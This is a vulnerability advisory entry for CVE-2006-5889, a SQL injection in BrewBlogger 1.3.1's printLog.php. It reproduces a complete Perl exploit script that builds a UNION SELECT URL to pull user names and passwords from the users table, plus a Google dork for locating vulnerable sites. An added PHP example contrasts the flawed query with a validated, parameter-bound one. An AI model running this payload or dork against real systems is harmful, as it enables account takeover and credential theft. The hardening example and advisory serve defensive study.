BrewBlogger printLog.php SQL Injection Vulnerability

Vulnerability ID: 1111511
Vulnerability type: SQL injection
Published: 2006-11-10
Updated: 2006-11-15
CVE: CVE-2006-5889
CNNVD ID: CNNVD-200611-205
Platform: PHP
CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/2751
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-205
|Vulnerability details
A SQL injection vulnerability exists in printLog.php in BrewBlogger (BB). A remote attacker can execute arbitrary SQL commands through the id parameter, which is interpolated unquoted into a SELECT statement.
|Exploit
#!/usr/bin/perl
use strict;
use warnings;
###########################################################################################
#Target:
#
#       BrewBlogger 1.3.1
#       http://brewblogger.zkdigital.com
#
#Vulnerability:
#
#       SQL Injection
#
#Description:
#
#       BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
#       Since each user entry contains an auto-incrementing ID number, it is possible to
#       enumerate all user names and passwords stored in the 'users' table by iterating
#       through every possible ID number.
#
#Vulnerable Code (truncated):
#
#       $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#       $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#       $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Output:
#       This script will produce a URL which will reveal the user name and password for
#       the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
#       the first user). The user name will be listed as "Method:" under 'General
#       Information', and the password will be listed as "Cost:".
#
#Usage:
#       ./brewblogger.pl <domain name + path> [user id]
#
#Examples:
#
#       ./brewblogger.pl www.beerblog.com 3
#       ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
#       intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
###########################################################################################


print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
#                                         #
# Discovered and coded by: Craig Heffner  #
###########################################
';

if(!$ARGV[0] || $ARGV[0] eq "-h"){
       print "\nUsage: ./brewblogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
       exit;
}

# Default to user ID 2 when no ID is given (see header comments)
my $id;
if(!$ARGV[1]){
       $id = 2;
} else {
       $id = $ARGV[1];
}

my $url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
my $string = "";
my $col = 1;

# Build a 210-column SELECT list to match the 'brewing' table; columns 8 and 9
# carry user_name and password so they land in the page's "Method:" and "Cost:"
# fields, and the last column is emitted without a trailing comma.
while($col < 211){
       if($col == 8){
               $string .= "user_name,";
       } elsif($col == 9){
               $string .= "password,";
       } elsif($col == 210){
               $string .= "1";
       } else {
               $string .= "1,";
       }
       $col++;
}

print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;

# milw0rm.com [2006-11-10]
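As an added example (not BrewBlogger's code and not part of the exploit above), the PHP below places the pattern from the advisory's "Vulnerable Code" excerpt next to a hardened lookup. The security-relevant point: addslashes() only escapes quote characters, but `WHERE id = %s` drops the value into an unquoted numeric position, so a payload containing no quotes passes through untouched; validating the id as an integer and binding it as a parameter closes that gap. It uses an in-memory SQLite database through PDO so it runs stand-alone; the table layouts, the `name`/`method` columns and the sample rows are constructed for illustration and are not the real BrewBlogger schema (only `users.user_name` and `users.password` come from the advisory).

```php
<?php
// Added example, not BrewBlogger's code. Runs stand-alone with the pdo_sqlite
// extension; schema and rows below are constructed for illustration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE brewing (id INTEGER PRIMARY KEY, name TEXT, method TEXT)");
$db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, user_name TEXT, password TEXT)");
$db->exec("INSERT INTO brewing VALUES (1, 'Pale Ale', 'all grain')");   // constructed sample row
$db->exec("INSERT INTO users VALUES (2, 'alice', 'constructed-pw')");   // constructed sample row

// Vulnerable pattern from the advisory: addslashes() escapes quotes, but the
// value is interpolated into an unquoted numeric position (id = %s), so any
// payload that avoids quote characters reaches the database parser unchanged.
function lookupVulnerable(PDO $db, string $id): array
{
    $colname_log = addslashes($id);
    $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
    return $db->query($query_log)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: accept only a positive integer, then bind it as a typed
// parameter so the database never treats the request value as SQL text.
function lookupHardened(PDO $db, string $id): array
{
    if (!preg_match('/^[1-9][0-9]*$/', $id)) {
        throw new InvalidArgumentException("id must be a positive integer");
    }
    $stmt = $db->prepare("SELECT * FROM brewing WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Same shape as the advisory's request (0 UNION SELECT ... FROM users), with the
// column list sized to the three-column table constructed above.
$payload = "0 UNION SELECT id, user_name, password FROM users WHERE id = 2";

$rows = lookupVulnerable($db, $payload);
printf("vulnerable lookup returned %d row(s): %s\n", count($rows), json_encode($rows));

try {
    lookupHardened($db, $payload);
} catch (InvalidArgumentException $e) {
    echo "hardened lookup rejected the input: ", $e->getMessage(), "\n";
}
printf("hardened lookup for id=1: %s\n", json_encode(lookupHardened($db, "1")));
```

Run it with `php` on the command line. The vulnerable function hands back the row from `users` in place of a brewing entry, which is exactly how the exploit above surfaces credentials in the "Method:" and "Cost:" fields; the hardened function refuses the input before any query is built, and a plain integer id still works. Integer validation alone would already block this case, but binding the parameter is what makes the query safe regardless of how the value is later used.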
|References

Source: VUPEN
Name: ADV-2006-4467
Link: http://www.frsirt.com/english/advisories/2006/4467
Source: MISC
Link: https://sourceforge.net/project/shownotes.php?release_id=463357&group_id=165855
Source: XF
Name: brewblogger-printlog-sql-injection(30200)
Link: http://xforce.iss.net/xforce/xfdb/30200
Source: BID
Name: 21026
Link: http://www.securityfocus.com/bid/21026
Source: MISC
Link: http://www.craigheffner.com/security/exploits/brewblogger1.3.1.txt
Source: SECUNIA
Name: 22810
Link: http://secunia.com/advisories/22810
Source: MILW0RM
Name: 2751
Link: http://milw0rm.com/exploits/2751